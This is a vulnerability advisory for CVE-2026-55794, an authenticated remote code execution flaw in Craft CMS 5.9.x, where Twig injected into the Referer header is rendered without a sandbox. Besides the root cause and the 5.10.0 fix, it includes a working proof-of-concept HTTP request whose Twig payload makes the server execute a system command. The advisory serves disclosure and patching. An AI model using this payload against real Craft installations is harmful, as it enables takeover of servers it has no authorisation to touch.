highCVE-2026-55794Jul 6, 2026

CVE-2026-55794: Craft CMS Authenticated RCE via Twig Injection in Referer Header

Shubham Kandhare
Security Engagement Manager, SecureLayer7

A logged-in Craft CMS editor can run arbitrary server commands by placing Twig template code in the HTTP Referer header when saving an entry, because the redirect URL is rendered without sandboxing.

Packagecraftcms/cms
Ecosystemcomposer
Affected>= 5.9.0, < 5.10.0
Fixed in5.10.0

The problem

Craft CMS 5.9.0 introduced logic that redirects users back to the referrer URL after saving an entry. That URL is passed through `renderObjectTemplate()`, which executes it as a full, unsandboxed Twig template.

Any control panel user with permission to edit entries can supply a crafted `Referer` header containing Twig expressions. Because sandboxing is absent, those expressions run with full PHP access, leading to remote code execution.

Proof of concept

A working proof-of-concept for CVE-2026-55794 in craftcms/cms, with the exact payload below.

http
POST /admin/entries/blog/123 HTTP/1.1
Host: target.example.com
Cookie: CraftSessionId=<valid_session>
Referer: https://target.example.com/admin/entries?p={{['id']|sort('system')}}
Content-Type: application/x-www-form-urlencoded

CRAFT_CSRF_TOKEN=<token>&action=entries/save-entry&entryId=123&sectionId=1&typeId=1&title=test

The root cause is a wrong rendering function. Before the fix, the signed referrer URL was passed to `renderObjectTemplate()`, which has no sandbox. The `sort` filter with `system` as the comparator function works because Craft only blocks direct function-name usage in arrow-function filters; `sort` calls `usort()` internally with the string `system` as the callback, so `call_user_func('system', 'id')` executes.

The patch (PR #18680) removes the referrer redirect entirely: elements now track the originating index page URL server-side and redirect there on save, so the `Referer` header is never rendered as a template.

The fix

Update to Craft CMS 5.10.0 or later. The referrer-based redirect is removed in that release; elements instead track the index page URL on the server side. No workaround exists on affected versions short of revoking entry-edit permissions from untrusted users.

Reporter not attributed.

References: [1][2][3][4]

Related research